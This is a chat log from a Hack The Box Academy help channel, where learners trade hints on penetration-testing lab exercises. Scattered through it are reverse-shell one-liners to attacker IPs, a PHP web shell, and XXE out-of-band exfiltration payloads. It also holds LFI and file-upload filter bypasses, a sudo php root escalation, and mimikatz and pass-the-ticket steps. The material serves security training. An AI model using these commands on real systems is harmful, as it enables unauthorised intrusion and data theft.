#modules
Module "three"
https://app.hackthebox.com/87d9fb98-300d-46d5-8f54-6eded3650380
so I managed to reach the shell page but it's not just that, my bash cmd doesn't work
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1
that isn't a module
└──╼ [★]$ bash -i >& /dev/tcp/10.10.14.44/1337 0>&1
bash: connect: Connection refused
bash: /dev/tcp/10.10.14.44/1337: Connection refused
I get hit with this error
I'm in labs tier 1
it's a box ask this at #starting-point
ohh okay
there is no such channel here lol
use ++verify at #bot-commands
ohh okay thank you
with the awesomeness of @vital adder for helping me through the problem
any hints for local file inclusion for the question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
You have to use multiple filter bypass methods in one command
yes...tried a few things...no success till now.. would you mind giving a more specific hint via dm?
hello, anyone who can share a hint about the sqli HTB API..!!!
Hi !
I am on Pass the Ticket (PtT) from Linux
Question : Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
I managed to import the good kerberos tickets and access the specified share and retrieve the flag. But it's marked as incorrect.
Does someone have the same issue?
Is that the correct way to write out the PORT address? it should be IP:PORT
Sure dm me
I get an error: "ERROR kuhl_m_sekurlsa_aquireLSA ; Handle on memory (0x000000005)"
this doesn't look like a privilege issue so i'm not sure if this is going to help but did you run this before that?
privilege::debug
token::elevate
Where did token:: elevate come from? I have not come across that in my research
i think i learn that from some stuff on tryhackme
That was the difference
so did it work?
Yeah after doing token::elevate
oh
Hi everyone, question about Shells&Payloads module, PHP shell section - I've uploaded the shell file as described in the section, and can see the vendor/icon. However specified path /images/vendor/connect.php is not existing. Should I modify anything in the shell file?
Not the strangest issue I have run into but still
oh wait i just double check i think the mimikatz command i send use isn't in the section either
No it’s not but I had found it on Google while researching the answer
But everyone I tried I got that error so I kept searching lol
Nvm, found the issue
Can someone explain if additional steps are needed to connect to some of the Fortresses modules? I'm interested in connecting to the AWS lab ... Those are designed for companies that want to host them. But I don't quite know how it works and AWS should be done using the AWS servers yet hackthebox is telling us to use their standard openvpn connection...
is this a htb academy module?
anyone free for a nudge on AD Enum & Attack Assessment2?
hey guys
local file inclusion module, section "basic bypass" question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
the hint is: ||Try to see what path the regular functionality uses|| do I need to use ffuf for this?
i'm kinda lost here.. i know htb likes to make you feel like you have to put your head through a wall to learn something...but i would appreciate some help... 😉
somebody knows if that is in the near of the right solution?
||./language....//....//....//....//....//....//flag.txt%00||
or that:||language=languages....//....//....//....//....//....//....//....//flag.txt%00||
footprinting - lab easy
What I found until now:
* useful information in hint
* two file transfer services running on server
* ssh on server requires key authentication
The problem:
* i can interact with the file transfer services
but are totally empty. I don't know how to move from here
Any help will be really appreciated
Hey everyone, I’m having issues receiving the credentials for rdp in the remote password attacks -Network Services. I have attempted hydra with the lists provided in the module but always get 2 server scans could not be completed error messages. Any nudges on what I am doing wrong would be greatly appreciated!
Don't change the command from the module. You altered the dc. Keep it the same and make sure to do it from the attack machine they give you ssh access to.
help on whitelist filters ||filename="shell.php\x00.jpg|| shows successfully uploaded but navigating to http://1.2.3.4:12345/profile_images/shell.php\x00.jpg?cmd=id|| gives Not Found Error. Used ||yoyi as magic number and <?php system($_GET['cmd']); ?> as code||
Did u b64 encode it ?
would you mind a DM? seems like i can only insert pics in DM not here
i do have some error in my note but not the one you are having so i don't know about that one but try restarting the target machine and for the username list first login to the target machine with previous cred and use the any un-user username as your list
hint check the hint and use the stuff in there to login to one of ||ftp service|| that you foun
hint this one is almost right
hello
hi sorry for leaving you hanging with some AD question the last few time (i didn't do that AD module) but i just finish this one and if you still need help you can use that example command but you just need to change the -Filter tag to *
hey man thanks i have managed to finish the module already cheers
oh congratz
thanks, is a nice module tho
a query, I'm doing my academy and some information seems to be outdated, because I try to apply them in the exercise and they don't work, an example would be in "module FILE INCLUSION, theme PHP Filters, The steps in the tutorial do not work"
You probably should message a mod or staff member, this is a help channel for the Academy platform and I doubt the correct place for such a request
Ah really sorry.
I saw many errors in several courses at the academy, which does not allow me to advance
Really? I haven't come across any yet. Albeit I'm not that far along, what path or module are you on?
They have an 'erratum' channel that corrects minor errors. On the left panel just below this channel
actually it is in the beginning, I thought it was my mistake, but I saw on youtube how others did the same step as me and if it worked for them, and I saw in the comments that several have that error
this module for example, I follow the steps, it is supposed to show me an error message on the page or a message, but the page does not throw me results, and there I am stuck
after doing /etc/passwd
I send you a screenshot as soon as I turn on my PC
That module is more than half way through the Pen Tester path, which is farther than I've got - so unfortunately I won't be able to help but I'm sure someone here will.
I am also new, that module is basic, you will surely get it
this is an exercise in academia
sorry, the person deleted their message - this was not directed at you. They were asking to be made a Mod. apologies
ok, tk
Does any of the buffer overflow modules go into heap exploitation?
Thanks for the answer. One of the commands in the cheat sheet did the trick
Hello @everyone
Hey All! I'm completely stuck on the following question, in the footprinting module: Enumerate the SMTP service even further and find the username that exists on the system. I have used nmap, metasploit, and smtp-user-enum all to no avail. I've logged in and poked around but I'm quite stuck. Other than trying another wordlist, which I tried a couple of iterations, I have no clue. What's more frustrating is that I've finished everything in the footprinting module (including the hard labs), and realized I had missed this single module. Assistance and pointers would be greatly appreciated!
oh my gawd
You mentioned you used wordlists but not if it was the provided one
I totally missed that download - I was searching for others
Thanks so much. I'll run with that and try
Should be a breeze now
careful with spoilers pls
It still doesn't seem to find anything with smtp-enum. Running in verbose, and changing the timing too. I can see it's running through all the names...
@spice onyx smtp-enum?
smtp-user-enum
I can see it's running through all 102 queries but no result
Have you read about the -w flag?
hmm I'm guessing no, but it just found it with metasploit and same list
🙂
I'll go try it with that as well, I was changing the timing but obviously I missed an option
Thanks so much - it was very annoying to only have this outstanding for the entire module! 🙂
Is there a reason why crackmapexec is able to brute force smb on my target but when I use hydra it comes back with an invalid reply from target?
Thank you so much @vital adder ! I didn’t realize we had to do some post exploitation enumeration here. I will keep this in mind to enumerate future machines for credentials moving forward 🙂
Hey all, I'm having issues on "Reverse Shell & Payloads" section in "The Live Engagement" module. I can't login into the skills-foothold via NoMachine RDP. I'm inputting the password "HTB_@cademy_stdnt!" as stated in the module. Is this the incorrect password or am I supposed to find the password for the Foothold machine? Any help would be much appreciated! 🙂
@magic valve it's a keyboard issue. Use the onscreen keyboard when you are trying to login when the terminal pops up after connecting through nomachine.
The onscreen keyboard should be top right of the terminal screen that pops up after logging in via RDP
nah not at all imo. Learning to google information is a great skill since no one remembers everything.
Hi there! Is anyone doing the sqlmap skills assessment module?
I'm stuck trying to find the vulnerable parameter I already tried manually so I can use it with sqlmap
FILE INCLUSION/ PHP Filters :
help I get this command to apply it in the exercise but it doesn't work :c
http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=config
I get blank, or do I have to find the way myself? :C
Did you try fuzzing for php scripts like the question asks you to? That should turn up some stuff to help you out
Almost all the example commands need to be modified for the exercise questions
If you're following one of the job role paths, I recommend doing the modules in order because they build on each other
The cheat sheets are useful on the modules too. There is a fuzzing section in the cheat sheet on this one if you want a refresher on what the question is asking for.
i did all those, Does everything work fine for you? Or do you still not have that module?
because my doubt now is, if that only happens to me, or to others too
I just went back and did it again, it still works for me
Module: Footprinting
Section: SMTP
HTB Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I've tried to use:
sudo nmap <IP> -p25 --script smtp-enum-users -v
msfconsole: smtp_enum
I haven't found anything. I see the hint says there's a footprinting wordlist that I may be overlooking which could solve this. Am I missing something or is the list in some obscure location?
can you help me private? , I can't send image here
Hey there, looking for a little help in Password Attacks - Pass the Ticket (PtT) from Linux. The last required question reads: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Having trouble with locating the ticket
Nvm, I'm dumber than a bag of rocks.
@west canopy Thank you! ... re your helpful Aug 5, 2022 reply on determining OS from NMAP output.
Hi guys ... How to convert Decimal number to RID for the active directory user
Try enumerating anything you can’t get an axfr response from.
DM me if you're still stuck.
Hello,
I'm blocked at "Broken Authentication"->"Predictable Reset Token", can you help me in dm please.
I was set the timezone, convert the timestamp in millisecond(x*1000), concat the htbadmin string with the timestamp before the md5() function
Could anybody help out in Password Attacks - Pass the Ticket (PtT) from Linux category? I am stuck on the last section
hello guys i have a question, why can't i unlock the sql injection module ?, i click it but nothing happens
Doing the File Inclusion Module: Basic Bypass. I have the flag displayed but it says it's incorrect. :C
Apparently the website inserted a space that I didn't see between the last character and the bracket...
I'm working on Attacking Web Applications with Ffuf and on the DNS records it talks about modifying the /etc/hosts with the command sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts' . I was wondering if anyone could explain why this is necessary in more detail and could I mess up my kali machine doing this?
[The Live Engagement] - [Issues interacting with Targets]
I was able to spawn the foothold server and I also could get into the spawned server but when I try to even ping from inside it to the targets ips it is not responding.
Checking the /etc/hosts the targets are already there:
||172.16.1.11 status.inlanefreight.local
172.16.1.12 blog.inlanefreight.local
10.129.201.134 lab.inlanefreight.local
||
Any tips ? 🙂 Thx!
You might want to check iptables to see the set of rules (chains) - there might be something about ICMP (ping) !
Even cleaning up the rules, it still doesnt work. I do think I'm missing something here. Other modules which I had to manually add the entries to /etc/hosts I had no issues like now.
Hello, quick question on the network services part of password attacks: am I really supposed to run crackmapexec through the user and pwd lists provided in the resources? Seems like a tremendous waste of time so I was wondering if there is another, smarter way of approaching the problem
@pliant sage what is the problem
well the user and password lists are fairly long, and I have to repeat the process for 4 different services so it feels like it's going to take a whole lot of time
since it's just one section of one module I thought maybe there was an easier way of doing it
ok I have a new problem, in smbclient the command "ls" returns the following:NT_STATUS_NO_SUCH_FILE listing *
does anyone have a solution?
nvm figured it out
Can somebody help me on file uploads skill assesment ?
I can't find a payload that works
My current payload gives me a 500 internal server error
Is that a step forward ?
@flint agate Have you looked at https://www.revshells.com/
Thanks
But actually my problem is that I don't know how to upload the file
I haven't done that specific module... Thought you just needed the shell
could be useful
I guess I can do it today.. I usually just use scp or http.server
But that implies ssh access 😅
Hi this Channel is about Hacking Right?
@burnt bronze This channel is for the modules of the academy
The thing is you need to use ||double extension|| and ||mime types|| but it is a lot of guessing I think
I don't really know when I am right or wrong
@flint agate what is the name of the module you're doing?
Skills Assessment - File Upload Attacks
https://academy.hackthebox.com/module/136/section/1310
if you found the upload directory and the remaining then this is the last step and for the internal server error issue i think that's because of your payload
try <?php system('your command here'); ?>
will do
I used this so far on every exercise
so did it work? also what extensions and magic number are you using?
now I am trying to upload it
I got another question the magic number for ||"jpg"|| is ÿØÿà␀␐JFIF␀␁ or ÿØÿà because I used the shorter one
I tried to fuzz but it doesn't work
just ÿØÿà
also here use this and pls don't use any wiki page https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5
I tried|| shell.phar%00.jpg|| and jpeg also but failed
wait try just remove the %00 thing
for all of the section in this module i didn't have to use anything weird naming thing like this
that was character injection
I think I might have an idea now after I saw this github
I tried to put magic numbers inside the php file but it seems that it doesn't work either
if you are on linux and run file with your payload it should show that payload as an image or something like that if you put the magic number in the right way
oh here something like this
and how did you put the magic number in?
At the first line before the payload, I used mousepad
this are the numbers right|| ff d8 ff e0|| ?
wait so you add that number to the first line??
yes
nope that isn't how you put magic number in
i have this pre-written down but i can't find it so give me a sec
It looks like that in your example
oh here found it
1. make a txt payload on top add AAAA
2. open that txt file in a hex editor
3. in the hex editor change the value of (41 41 41 41) to (FF D8 FF E0)
4. save and change the extension from .txt to .phar.jpg
wait which one?
this one
no that's the end result after adding the magic number
WOW
It worked
I used an online hex editor
but that was mind blowing 😱
I hope I can finish the assessment now 🫡
Ghex is a nice app to get familiar with, then when you're happy, use one of the many terminal apps.
can't you find the directory using ||dirbuster|| ?
if you use a wordlist that have the right directory name then yes
I know the upload directory from the comments in the chat history but how did you find it ?
where did you find this ?
Wait the first thing you need to do is ||read the source code with xxe||
the source code of ||/contact|| ? or|| /|| ?
I used the XXE of the previous exercise
at /
This should do it
||<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/"> ]>
<svg>&xxe;</svg>||
but do I need to change the file I upload again ?
I mean change the file to a svg and put the magic numbers again ?
hint no you don't need to ||magic number|| or the ||.svg|| for this also the source is at the web root not the linux web root
should I look for files like /conf or /root
nope it at the web root
I have no idea what you mean.
Is it|| #|| or a file ?
shoot me dm i'll send you the payload
Hey guys I need a hint for Web Attacks - Blind Data Exfiltration. I can't seem to get a request with the contents of the file. I do get a request, but it doesn't have the content.
Edit: solved
Hint: ||make sure to reference the correct entity in your payload, even if it looks wrong||
for the payload you ||<root>&content;</root>|| at the end also the need the index.php file but that is for decoding so if you can't get any call back at all then i think it's the first one
Works now! Thank you. Could you explain why it works with ||&content;||, since it's not defined anywhere as an entity?
all i have in my note is remember to use it 🤣
oh wait in the dtd file thing have ENTITY content so my guess it have something to do with that maybe?
Ye, it is in ||<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">||, but it's not itself an entity. I changed it because I figured the one in the lesson is just an example and we have to figure out the correct one
XML be weird
Verify your account then head over to #1035976205842780170
Hi guys, I need some help with the Web Attacks Skills Assessment. I am trying to ||change another user's password||, but I am getting Access Denied
Edit: solved
hint it isn't ||POST|| also pls put that token into spoiler tag
Works. Thank you!
hi guy, any hint for Active Directory LDAP - Skills Assessment question 3?
hello, once rdp into the foothold machine how long does it usually take for the infrastructure to come up and become available? I've tried to ping the other machines but none of them seem to be up, not sure if I'm doing something wrong. Thank you
Hi
Has anyone been able to do File Inclusion Skills Assessment, I feel like the '&cmd=pwd' poisoning should work, but it's not, and I'm not sure if I'm able to edit the nginx files
if you use single quote for the payload then that should work
Hey I need some help for the Login Brute Forcing module. I'm at the skills assessment website and I don't understand the hint.
It says "You may reuse the username you found earlier. Make sure you got the correct fail string and parameters." But which username are they talking about ? I've tried both usernames from last exercises ||m.gates and b.gates|| and I found nothing
This is what I'm trying to inject, and it doesn't seem to like my cmd attempts:
that hint basically mean you can re-use the username from question 1 also the your hydra give some false positive or took too long when there is something wrong most likely the fail string hence the second part in the hint
that's the right payload and if you are poisoning ||nginx || log and still get nothing then you should restart the target
I've tried it with the user from the first question and still haven't found anything
I keep getting empty responses even though I've restarted, and If I try to let's say just put a single word there It will work, but with CMD it does not
can i dm you ?
sure
oh wait if you get completely empty responses then there is a chance the target machine crashed
It's a bit messy as I try to keep it spoiler free, but here is when I try with just normal word:
yea... you shouldn't do that because if you inject that the log system can't processes then the system or nginx will crash
Ahh, I'll try straight up cmd inject, thanks!
also recommend greenshot for taking and censoring screenshot on window
Is there an admin that could help me with an issue regarding a module? There is definitely an issue with the lab that makes it impossible to solve
This is regarding the The Live Engagement section of the Shells & Payloads module. The foothold is unable to reach the targets. The corresponding network interface is missing..
Got it thanks, that was really unpleasant, had to completely destroy the target and remake it after every command, thanks for the help!
if someone can help with Limited File Uploads section of File Upload Attacks. says file uploaded successfully. but the output shows "This XML file does not appear to have any style information associated with it. The document tree is shown below. " and all i see below is <svg/>
Can anyone help me out with Attacking common services SMB? I keep downloading an empty file and bruteforcing creds aren't working with the provided wordlist
same. Foothold is unable to ping targets.
So i'm stuck again for the login brute forcing module first question in Skills Assessment - Service Login As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.
So I'm not sure what to use for the username for the password I created a list with cupp -i.
Good evening from Spain! anyone have solved the Active Subdomain enumeration module?! Been stuck for a while 😦
@rustic sage what is the problem
I've been trying with dig, nslookup but don't get much back... I added the IP to my etc/hosts file but still I get the "server can't find" error
@rustic sage did u brute force subdomain
I'm downloading wordlists to use with gobuster
Any help would be appreciated 🙂
Hi together, I join the asking club...
in the local file inclusion module at the section php wrappers is this command:
curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
to curl the php configurations...when i curl i'm able to curl the page but i see nowhere the base64 encoded configuration code like in the example...
anybody knows why?
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
Can someone help with this on the Active Dir Living off the Land mod
Hey has anybody completed the newly updated sections added to Password Attacks?
need help with file uploads skills assessment. anyone available that i can dm to provide what i have so far?
@north ermine Is it okay if I pm you regarding some of the previous questions you have asked?
Need Help File Uploads Skills Assessment. I am able to upload files according to Burp. I found the source code also. Just don't know how to read the source code to figure out how to finish the task (where is the file located)
can someone please explain this command in details:
i know it shifts characters to produce a '/' however i do not understand how it works and i cant reuse it to shift new characters
echo $(tr '!-}' '"-~'<<<[);
Can someone point me in the right direction for Password Attacks - Credential Hunting in Linux. || I used the hint and found I could list the shares of the ftp server with the hint u/pswd but I dont know where to go from here. Are we supposed to just brute force will? ||
What are you guys' thoughts on the questions on HTB ACADEMY ? Sometimes I get really confused trying to understand them ( some of them of course)
Follow the motto Try Harder, google is your friend and personal research is required for I'd say about 60% of the questions
Also this Discord is a godsend
Could someone help me on Password Attacks Credential hunting? || I've tried running a password mutation on the suggested password and brute forcing but I still cant get in. Can someone point me in the right direction? ||
@sterile hawk
ty
yw
What HellsCrypt said. I really get angry at some of the modules because they desperately need a rewrite, but overall the academy will give you a solid foundation to work on
module -password attacks, section- pass the hash , question "Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt." I found davids hash but not sure what tools or commands syntax im supposed to use to be able to access the share. Tried some commands from various online tutorials but none of them are working or giving errors. Anyone know what tool you need to use?
THINK I had to connect directly to the lab from my machine directly, no vm, firewall, or vpn. Only way I could get it to work
Linux or windows credential hunting?
Linux
did you find kira credentials?
|| Just what's given from the hint, I tried brute forcing and mutating that password. But I don't have a clue. ||
you do need to create a mutated password list using the given password and the given mutated rules.
Did exactly that
Yup tried that x)
DM me
just guessing but think you may have made an error when making the mutated list
Did you already complete the questions about david in that section? I found his hash what tool are you supposed to use to pass a hash to access a share?
What module name and section you working on?
Module name: Shells&Payloads
Section name: Bind Shell
Question: SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.
Problem: I use bind shell to connect to both machine together, but i wait for a while and this is all i have, what is my problem?
I'm currently having the same issue. Please let me know if you speak with anyone that can help
How can I see the operating system?
nmap --script smb-os-discovery.nse -p445 10.10.10.40
I found this other one but it doesn't work either
sudo nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139
@chilly nymph use -O
okay ty ñ.ñ
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: CEO-PC
| NetBIOS computer name: CEO-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-27T00:59:46+00:00
Why doesn't the result come out like the tutorial? version change?
@chilly nymph Because everything changes
xd, ah okay ñ.ñ thanks
@chilly nymph np
@wide river the problem is that, that is not a blind shell because netcat has no e option
Hi, is the SG vpn server down? I can't download the configuration file
What’s the best channel for support? Trying to do the Shells & Payloads module, but the boxes are down
Good morning from Spain!!
use mimikatz to get a cmd with that hash and then just read the file "type \dc01\david\david.txt". Remember that it has a double forward slash before "dc01"
Someone with a little hint in the information gathering web skills assessment!
Again can someone help with question 3? https://academy.hackthebox.com/module/143/section/1360
I've been stuck for a while with this one: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host? Any hints appreciated 🙂
Please see your DMs for instructions on how to verify your HTB account.
Hi trying Attacking Common Services - Hard, couldn't figure out how to impersonate as another user? any pointers? ( I have found the linked server, in mssql studio as f****** but don't know what to do from here ) Solved it, but how are we actually supposed to find which user we can impersonate, that part for me was pure guesswork.
for anyone else who is stuck, once you have a rdp session you don't need to try different usernames and password combinations.
can anyone give me a nudge on login brute forcing - skills assessment - website?
can't seem to find the right lists to use with hydra
module/115/section/1139
Shells & payloads // The Live Engagement
I can't seem to get nomachine running on port 4000 or 3389 so I can't even start with the challenge
You shouldnt need to use Nomachine any longer. You can use xfreerdp to connect to the jump host now. It is better performing than Nomachine.
Nomachine was recently removed from that target due to continuous performance issues.
Oh 😦
Did you like Nomachine?
I just wanted to see how it worked
Never used it before 😁
Can someone give me a pointer on the machines? I seem unable to ping any of the machines from the foothold machine
there is a lot of people having the same issue of the target machine down for the The Live Engagement right now and did check and that seem to be the case
i think they remove the lab with the nomachine replace it with an older lab or something
So I'm supposed to just wait for a fix from their side?
this isn't the first time thing like this happen but for this i think yep
🤔
also it seem like 2 out of 3 target is down but the third target network have some new ip that i don't think i did saw before (i don't have this part in my note so i'm not 100%) i didn't enum much with any of those ip but it could the domain in the hosts file get set to the wrong ip in this older lab
edit: nvm i think there an networking or something and new NoMachine is missing the tun0 interface "172.16.1.5" also i don't think the PRTG Network Monitor (APP03) i found is one of the target
Have you tried spawning that challenge from another VPN?
hi
like the hint said re-check if you got the right fail string and parameters if that doesn't help shoot me a dm if you still need help with that
Ay guys how you doing
I've been stuck for the past couple of days on the second task of "knowledge check" section in the "Getting Started" module. The hint says try running linenum or linpeas but I can't download them on the machine as I have almost no permissions on it. Any hints/help?
@dense sonnet use wget
tried it, I don't have permission to write any files.
tried to wget from my local machine and from the internet, permission denied.
@dense sonnet try to use sudo -l
yea i tried it too it just shows that I can use /usr/bin/php without a password
@dense sonnet php may lead to privileges escalation
isn't /usr/bin/php just a directory?
when I click enter to run the command it just keeps going one line down without doing anything
@dense sonnet use CMD="/bin/sh"
sudo php -r "system('$CMD');"
Hi guys, I need some help with attacking common applications - joomla discovery and enumeration. I am trying to brute-force the admin user password at http://app.inlanefreight.local/<SPOILER>, but the script shown in the lesson takes forever (doesn't seem to work)
Edit: solved. I was using the wrong wordlist.
Hint: ||use the same wordlist as shown in the lesson||
Hi, I am just at the skills assessment, but I do not have answers to some questions, it may be strange, but the questions for me are vague
Windows Privilege Escalation =>
Initial Enumeration =>
=> What non-default privilege does the htb-student user have?
=> Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?
thank you 🙂
Any admin for The Live Engagement on shells&payloads? the network seems down, at least from what i can tell..if someone can check that and let me know..thank you
Just ask and explain your issue with some details that should include module and screenshots if possible.
just started what is the ans of last question of MEOW(Submit root flag)
So these are not modules these are starting point boxes
So best place in future to ask is #starting-point
ok
But you need to log on to the machine and get the flag
ok
Think about the port you found with nmap and what tool you would use to access it.
It does the same as if I run sudo /usr/bin/php
just gives me nothing and lets me go down lines
Can someone tell me
how to get the flag in this
i got the username and password
authentication also done
but how to read emails in smtp
Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.
This is the question
which email are they talking about?
Solved. With a small changes it worked... but only in pwnbox.
You can't read email with SMTP. Check out some of the other email protocols mentioned in the lesson
yeah
imap and pop3 i can use
i learnt that
didnt see commands to read in nmap so stopped
will check again
thanks
yw
:< i feel sad, my connection got lost after completing the Meow stage
Hello from Spain!
I'm looking for some hints with the 3rd question of the web skills assessment! the "servers name" of i.igmur :/ :/
Can you PM the folder? I'm too lazy to go through 100 folder manually, this isn't hacking lol
@rustic sage use burp suite
Ok Crean, I`m on my way!
@warm sand Did you manage to progress with Shells & Payloads?
I'm stuck unable to ping even the first host
Im in burp suite but the browser doesnt open the i.igmur.com... and the scan gives me back little information
@rustic sage if it is not working use curl
Ive tried curl with the i.igmur and the relocated name but I dont see the servers name... for what Ive read in the forums Im not understanding the questions...
@rustic sage use curl -i
I have used -i and -I and nslookup and dig commands...
hint you can use the one in the example
I ended up using https://github.com/Nekmo/dirhunt
nope, nothing
I'm waiting on support now for an answer
hint the question need the "server name" so if you use curl with -I check the output and find the server tag and submit that name
oh try refresh the page if you got nothing back from support for a while also the nomachine is missing an network interface (tun0 / 172.16.1.5) and 2 out of 3 target machine is on 172.16.1.0/23 so i think that's why the nomachine can't access the target
I can see the Server: Apache/2.4.38 (Debian) but that`s not the correct answer 😦
Has anybody finished up the last newly added sections for Password Attacks - Pass the Ticket: Linux?
how tf did you get that? i don't think it is even running apache also the imgur is currently down this is what i got when i go to page Imgur is temporarily over capacity. Please try again later so i don't even know how did you get what service a website is running when the website it self isn't even up
yep i did also what's the issue?
I thought it was kind of weird that I didn`t get anything back when I typed on my browser...
@vital adder Tried to find tun0 but no success and I've been in queue for support 18 minutes so far
oh the refresh thing is just to see if you got new message or not and yes tun0 is missing on the nomachine
I been stuck on hacking wordpress login section if somebody could point me in the right direction
I was able to find the ||keytab file within /etc/krb5.keytab|| and tried impersonating that user to log in via smb but had no luck with it. Am I expected to crack the NTLM hash? Also tried kinit but it said something along the lines of lack of credentials within the keytab file
no but after impersonating using that ||keytab|| file what command did you try to get the flag
I could do the curl req to see things but when i try the curl -X -d POST request it gives a 403 access denied or sm and im not sure if i need to find credentials to enter in the -d data section of curl am i on the right track?
The File wasn't working for impersonating that user. Do I need to keep trying all of the options which get listed when I run klist -k -t?
Thanks!!!!!! found it!!!
oh you just need to use the kinit tool with -k -t for the impersonating part
also here is the format for this kinit (username) -k -t ||keytab file||
nice
do some re-search about "WordPress xmlrpc attacks" on google also a hint for this is you don't need any cred and you can do this in curl but some of the example on google do it in burp
The error I've been getting was "Keytab contains no suitable keys for ......"
Thank you! Ya that’s what was weird for me I haven’t used burp yet but Google results included a lotta burp
i remember that error but i don't have that error in my note shoot me a dm with your command
Will do thanks
Hi
@sand mauve hei
e option on target machine or my machine ?
hey guys im struggling with the password attack task: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.
@wide river target
used multiple rules list with the user sam but nothing works
@leaden quail what is the problem
brute forcing for hours with hydra... seems im doing something wrong
but i follow the instructions
so it is gonna be
nc -lnvpe [ip] [port] ?
@wide river nc <attacker-ip> <port> -e /bin/bash
rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc $YOURIP $PORT 1>/tmp/b
is that for me ?
😊
so i use that code for target machine or my machine ?
Haha
You made 2 tiny mistakes
In the first command you specify 430 and you're listening on 443 on the other machine
And you're writing it as two command while you have to pipe them
Are you getting a shell or not?
Does whoami give you an output?
im redoing it again..
and..
this is where im at right now
and typing command dont return anything
Ok
So you want to run a listener on your hades machine
which is nc -lvnp port
And then you try to get the htb-student machine to connect to it via a command
so the bind shell suppose to have listener on my hades machine ?
on my hades machine ?
listener should be on the target machine if you want a bind shell
And you already ran the command in the module?
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l IP PORT > /tmp/f
@wide river use nc ip address port -e /bin/bash on the target and use nc -lvnp ip address port on ur local machine
can i inbox you?
@wide river yes
somebody did the shells and payload skill assessment ? For me its completely broken with freerdp. Its hella slow, and the internal ips are not working
@zealous belfry Bunch of people have this issue, apparently the tun0 adapter from the machine is gone
I'm trying to chat with support but I've been in queue for 1h so far
someone help me out with hacking wordpress? Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer. maybe can send me a url to something that helps explain wordpress xmlrpc attacks?
is this for the getting started section ?
Any clues for the "getting started" privilege escalation. switching from user1 to user2. Ran linpeas and tried dirtycow and dirtypipe neither worked due to glibc not being found.
I feel like its easier cause its in the getting started section but Im not seeing it any help is appreciated
Hello! for the AD Enumeration skill assessment I can i get some help on how to get the cleartext credentials for another domain user? Thank you.
its for hacking wordpress section but i havent finished that one yet either
I used wpscan and then msfconsole had a great module for it
just dont forget the port and uri for msf
Hi, for AD LDAP "Credentialed LDAP Enumeration", does anyone know how to authenticate to the IP? Im getting this screen when I try to RDP:
@charred pawn what is the problem
not sure how to list all possible method calls using curl post
The hint will tell you. If you don't understand the hint, you can google info about the hint
You can DM me if you're still stuck
This Firewall and IDS/IPS Evasion (hard) module is driving me insane
I found the tcpwrapped service on port 50000. I can't figure out the version.
It shows either tcpwrapped or ibm-db
hey, I am new here, is this the right channel to ask question about "Starting Point boxes"?
Hi @bleak compass, I run into the same issue... password is not working ... did you work it out somehow?
Same here... The three hosts seem unreachable.
You tagged the wrong person lol
damn sorry...
ya guess we'll have to wait until something more practical comes around 😄
for some reason i cant spawn a module'
it say i already have one open
and i dont know how to see the one that is open
You doing academy or #starting-point ?
academy
I’m not sure then. I’ve never seen that issue with Academy
Im still stuck on hacking wordpress module login.. so far i tried curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value><string>methodcall</string></value></param></params></methodCall>" http://46.101.14.23:30931/xmlrpc.php
and i got better results i think but im sure sure what a method call is
curl -X POST -d "{search:"system.listMethods"}" -H "Content-Type:application/json" http://46.101.14.23:30931/xmlrpc.php
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault>
<value>
<struct>
<member>
<name>faultCode</name>
<value><int>-32700</int></value>
</member>
<member>
<name>faultString</name>
<value><string>parse error. not well formed</string></value>
</member>
</struct>
</value>
</fault>
</methodResponse>
curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params><param><value><string>methodcall</string></value></param></params></methodCall>" http://46.101.14.23:30931/xmlrpc.php
anyone free for a nudge on the AD LDAP module? Stuck on finding members of the Pentest OU in the Enumerating Active Directory with Built-in Tools section
Hi Everyone, how you doing? In the final assessment of SQLMAP ESSENTIALS, I retrieve the table final_flag, but its content seems wrong, any help? Thanks in advance!!
I had this same issue last night. I went back and looked over the lesson and found different command you can aim at a service. I got the answer from it.
Thanks! I've used the -sV, version script, -sC, tcpdump, and ncat to try and enumerate the version. It's not one of those?
If it's the problem I'm thinking of, I'd look back over the netcat section.
